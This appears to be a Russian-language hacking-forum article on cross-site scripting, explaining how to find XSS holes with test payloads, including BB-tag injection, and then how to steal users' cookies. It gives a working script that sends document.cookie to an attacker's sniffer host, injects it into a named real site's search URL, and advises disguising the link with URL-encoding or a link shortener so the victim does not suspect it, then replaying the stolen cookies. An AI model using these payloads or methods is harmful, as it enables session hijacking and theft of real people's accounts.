Социальная инженерия от А до Я


Приветствую вас Гость | Главная | Наши статьи | Регистрация | Вход | RSS
Менюшка
Категории раздела
Новичкам [5]
Статьи для новичков в СИ
Схемы [1]
Наши схемы, которые можно применить в СИ
Теории [0]
Наши теории, не проверенные схемы, предположения.
Разное [3]
Статьи не вошедшие не в один из разделов.
Серчинг:
Облачко тегов:
схема угона icq Угон icq угон аси Отправка e-mail с подменой адреса Отправка писем с дургого адреса ошибки Подмена e-mail Примеры техники FAQ mIRC Наш канал основы термины Чат ICQ qip ася Анонимная отправка смс взлом e-mail взлом почты блюэтуз Взлом мобильного синий зуб Взлом в контакте Информационная разведка ИР просмотр закрытых данных в контакте Взлом архивов rar ZIP взлом
Главная » Статьи » Разное

Уязвимость типа XSS
1.Что такое XSS(англ. Сross Site Sсriрting — «межсайтовый скриптинг»)
Уязвимость типа XSS позволяет вставить произвольный javascript код в тело страницы. Атака XSS отличается от других(напр. SQL injection или PHP injection) тем, что действует не на сервер, а на клиента. С ее помощью нельзя посмотреть таблицы БД, залить шелл и т.п. Чаще всего XSS испульзуют для кражи cookies.
Cookies(Куки) - небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла. Обычно куки используются для хранения учетных записей, и, чаще всего, в них находятся закодированные пароль, логин, и идентификатор сессии.(хотя далеко не всегда)
XSS бывают двух типов, активные и пассивные.
Пассивные XSS требуют от жертвы непосредственного участия, например перейти по ссылке, содержащей javascript код. При использовании этого типа XSS не обойтись без СИ(Социальная Инженерия)
Активные XSS не требуют никакого участия со стороны жертвы, ей достаточно лишь зайти на страницу с XSS. Активные XSS могут быть, например, в сообщениях на форумах, чатах, в добавлении новости и т.п.
2.Поиск XSS
В этом пункте я расскажу как найти xss
2.1.Пассивные XSS
Чтобы найти пассивную XSS достаточно подставить в форму ввода <script>alert('xss')</script> если скрипт сработал и появилось сообщение "xss" значит уязвимость присутствует, если скрипт не сработал можно еще попробывать "><script>alert()</script>, это, наверное самая распространенная xss уязвимость. Если ни тот ни другой скрипт не сработал то уязвимости, скорее всего, нет.
Рассмотрим на примере.
http://miss.rambler.ru/srch/?sort=0&set=miss&words=
Видите форму "искать"? вставим туда "><script>alert()</script> и нажмем "найти"
Вылетело окошко c xss, значит xss присутствует.(возможно, на момент прочтения вами данной статьи эту xss уже пофисят)
2.2.Активные XSS
Такие ксс могут быть, например, в полях профиля, при добавлении новости в названии новости и в самой новости(реже), в сообщениях на форумах/чатах/гостивухах при включенном html. Тут все просто, вписываем в поля скрипт из предыдущего подпункта, и если сообщение вывелось на экран, то уязвимость присутствует.
Рассморим xss в BB тегах на форумах.
можно попробовать тупо вставить javascript код в тег, например так:
[IM*G]javasсriрt:alert('xss')[/IM*G]
У некоторых тегов есть параметры, например у тега [img] есть параметры dynsrc и lowsrc, попробуем подставить код так:
[im*g]http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')[/im*g]
Если скрипт сработал, xss есть
3.Использование XSS для кражи cookies
Теперь самое вкусное))))
Для того чтобы украсть куки нам понадобится веб-сниффер, можно установить какой-нибудь сниффер на свой хостинг, а можно воспользоваться онлайн-сниффером, которых сейчас полно.
Чтобы украсть куки через пассивеую XSS надо чтобы жертва прошла по ядовитой ссылке. Чтобы украсть куки мы будем исользовать вместо <script>alert('xss')</script> другой скрипт:<script>
img = new Image();
img.src = "адрес картинки-сниффера"+document.cookie;
</script>
подставляем скрипт в ссылку и даем жертве перейти по ней, смотри лог сниффера и радуемся.
Рассмотрим на примере.
Возьмем ту XSS на рамблере из предыдущего пункта.
Вставляем
"><script>
img = new Image();
img.src = "адрес картинки-сниффера"+document.cookie;
</script>
в форму поиска, нажимаем "найти", смотрим адресную строку и видим:

http://miss.rambler.ru/srch/?sort=0&set=miss&words ="><script>img = new Image();img.src = "адрес картинки-сниффера"+document.cookie;</script>
Кидаем эту ссылку жертве и радуемся кукам.
Увидев такую ссылку жертва может что-то заподозрить, поэтому желательно закодировать
"><script>img = new Image();img.src = "адрес картинки-сниффера"+document.cookie;</script>
в URL Или воспользоваться сервисами типа http://tinyurl.com/
Перейдем к активным XSS, тут все просто, вместо alert() вставляем img = new Image();img.src = "адрес картинки-сниффера"+document.cookie;

Теперь у нас есть куки. Но что с ними делать? Все просто, их надо подставить вместо своих. В браузере Opera есть встроеный редактор cookies(инструменты->дополнительно->управление cookies), для firefox есть плагин(не помню как называется, юзайте гугл)
На этом пока все, возможно статья будет дополняться
(с)Xakerc

Источник: http://www.webxaker.net
Категория: Разное | Добавил: samorg (03.08.2009) | Автор: Xakerc
Просмотров: 2274 | Комментарии: 2 | Рейтинг: 0.0/0 |
Всего комментариев: 1
1 torres  
0
спс

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Опрос
Как давно вы интересуетесь СИ?
Всего ответов: 142
Друзья сайта:
Полигон испытаний СИ для новичков

Samorg © 2024 - - Дизайн эксклюзивно от www.w2u.net.ru